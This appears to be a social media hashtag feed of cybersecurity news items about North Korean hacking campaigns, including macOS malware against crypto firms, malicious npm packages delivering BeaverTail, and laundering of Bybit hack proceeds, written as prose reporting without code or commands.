North Korean‑linked hackers target U.S. healthcare with ransomware like Medusa, aiming to disrupt services and demand ransoms. Agencies warn attacks may continue on critical health orgs in the U.S. & Middle East. #NorthKoreaHackers #Cybersecurity #USHealthcare #Ransomware #Medusa #CISA #FBI

North Korean Hackers Deploy New macOS Malware in Crypto Theft Campaign  North Korean hackers, tracked as UNC1069 by Google's Mandiant, have deployed sophisticated new macOS malware in targeted cryptocurrency theft campaigns. These attacks leverage AI-generated deepfake videos and social engineering via Telegram to trick victims into executing malicious commands. The operation, uncovered during an investigation into a fintech company breach, highlights the evolving threat to macOS users in the crypto sector. The malicious campaign begins with hackers compromising a legitimate Telegram account from a crypto executive to build rapport with targets. They direct victims to a spoofed Calendly link leading to a fake Zoom page hosting a deepfake CEO video call. Posing as audio troubleshooting, attackers guide users to run ClickFix-style commands from a webpage, tailored for both macOS and Windows, initiating payload deployment. Mandiant identified seven distinct macOS malware families in the chain, starting with AppleScript and a malicious Mach-O binary. Key tools include WAVESHAPER, a C++ backdoor for system reconnaissance and C2 communication; HYPERCALL and HIDDENCALL, Golang loaders and backdoors enabling remote access; and SILENCELIFT, a minimal backdoor disrupting Telegram on rooted systems. Newer implants like DEEPBREATH, a Swift data miner bypassing TCC protections to steal keychain, browser, and Telegram data, underscore the attack's breadth. Additional malware such as SUGARLOADER, a persistent C++ downloader, and CHROMEPUSH, a Chromium extension stealer harvesting credentials and keystrokes, maximize data exfiltration. This unusually high volume of payloads on a single host aims at crypto theft and future social engineering using stolen identities. Detection remains low, with only SUGARLOADER and WAVESHAPER showing VirusTotal flags, emphasizing stealth. UNC1069, active since 2018, shifted from Web3 targets in 2023 to financial services and crypto infrastructure last year. Similar tactics were seen in 2025 BlueNoroff attacks, but this campaign introduces novel tools amid North Korea's growing macOS focus. Crypto firms must prioritize endpoint detection, deepfake awareness training, and TCC hardening to counter these persistent threats.

North Korean Hackers Deploy New macOS Malware in Crypto Theft Campaign #malware #Mandiant #NorthKoreaHackers

#TrackingTheTether #CryptoCrimeNetwork #CryptoCoverUp #BlockchainForensics

The International Consortium of Investigative Journalists traced tens of thousands of transactions and found major crypto trading platforms awash with dirty money.

#NorthKoreaHackers #CartelCash
#MoneyLaunderingEmpire

North Korean hackers may hold 900+ crypto jobs, ZachXBT warns As much as 920 North Koreans might have infiltrated crypto firms, under direction of the regime.

🚨 North Korean hackers are infiltrating crypto firms, with $16.58M paid to their IT workers since Jan 2025. 🕵️‍♂️ ZachXBT warns of insider threats—red flags include fake IDs, Russian IPs, and GitHub name changes. Stay vigilant! #CryptoSecurity #NorthKoreaHackers

North Korean Hackers Use 11 Malicious npm Packages to Propagate BeaverTail Malware  The North Korean threat actors behind the ongoing Contagious Interview campaign are expanding their tentacles on the npm ecosystem by distributing more malicious packages including the BeaverTail malware and a new remote access trojan (RAT) loader.  "These latest samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation in the threat actors' obfuscation techniques," Socket security researcher Kirill Boychenko noted in a report.  The following packages were downloaded over 5,600 times before being removed: empty-array-validator, twitterapis, debugger-vite, snore-log, core-pino, events-utils, icloud-cod, cln-logger, node-clog, and consolidate-log.  The announcement comes nearly a month after six npm packages were discovered to be distributing BeaverTail, a JavaScript stealer that can also deploy a Python-based backdoor known as InvisibleFerret. The campaign's ultimate purpose is to breach developer systems using the premise of a job interview, steal sensitive data, syphon financial assets, and maintain long-term access to compromised networks.  The newly discovered npm packages masquerade as utilities and debuggers, with one of them - dev-debugger-vite - utilising a command-and-control (C2) address previously identified by SecurityScorecard as being used by the Lazarus Group in a campaign called Phantom Circuit in December 2024. What distinguishes these packages is that some of them, like events-utils and icloud-cod, are connected to Bitbucket repositories rather than GitHub. Furthermore, the icloud-cod package was discovered to be located in a directory called "eiwork_hire," confirming the threat actor's usage of interview-related themes to activate the infection.  An investigation of the packages, cln-logger, node-clog, consolidate-log, and consolidate-logger, revealed slight code-level differences, indicating that the attackers are publishing numerous malware variants to boost the campaign's success rate. Regardless of the alterations, the malicious code encoded in the four packages acts as a remote access trojan (RAT) loader, capable of spreading a next-stage payload from a remote server. Cybersecurity expert Boychenko stated that the exact nature of the malware being disseminated via the loader is unknown at this time due to the C2 endpoints no longer serving payloads.  "The code functions as an active malware loader with remote access trojan (RAT) capabilities," Boychenko noted. "It dynamically fetches and executes remote JavaScript via eval(), enabling North Korean attackers to run arbitrary code on infected systems. This behavior allows them to deploy any follow-up malware of their choosing, making the loader a significant threat on its own.”  The findings highlight the persistent nature of Contagious Interview, which, in addition to posing a long-term threat to software supply chains, has adopted the infamous ClickFix social engineering approach to propagate malware.  The discovery of the new npm packages comes as South Korean cybersecurity firm AhnLab outlined a recruitment-themed phishing effort that downloads BeaverTail, which is subsequently used to launch a previously undocumented Windows backdoor known as Tropidoor. The firm's analysis of data shows that BeaverTail is actively targeting developers in South Korea.

North Korean Hackers Use 11 Malicious npm Packages to Propagate BeaverTail Malware #BeaverTail #malware #NorthKoreaHackers

Bybit Hack: How Lazarus Group May Launder $1.4B Through Crypto Mixers Bybit Hack Proceeds May Be Laundered Through Crypto Mixers, Warns Elliptic Blockchain analytics firm Elliptic has raised concerns that the

Bybit Hack: How Lazarus Group May Launder $1.4B Through Crypto Mixers.
#BybitHack #CryptoHack #LazarusGroup #CryptoTheft #BlockchainForensics #CryptoMixers #CryptoLaundering #Elliptic #NorthKoreaHackers #CryptoSecurity #EthereumHack #StolenCrypto #CryptoExchanges #DEXs #CryptoAssets #StolenFunds

DPRK Hackers Dupe Targets into Typing PowerShell Commands as Admin: A Comprehensive Report | The DefendOps Diaries Explore how Kimsuky hackers use PowerShell and social engineering to exploit targets, highlighting the need for robust cybersecurity measures.

DPRK Hackers Dupe Targets into Typing PowerShell Commands as Admin: A Comprehensive Report

thedefendopsdiaries.com/dprk-hackers...

#kimsuky
#powershell
#cybersecurity
#socialengineering
#infosec
#cyberthreats
#northkoreahackers
#phishing
#cyberattack
#securityawareness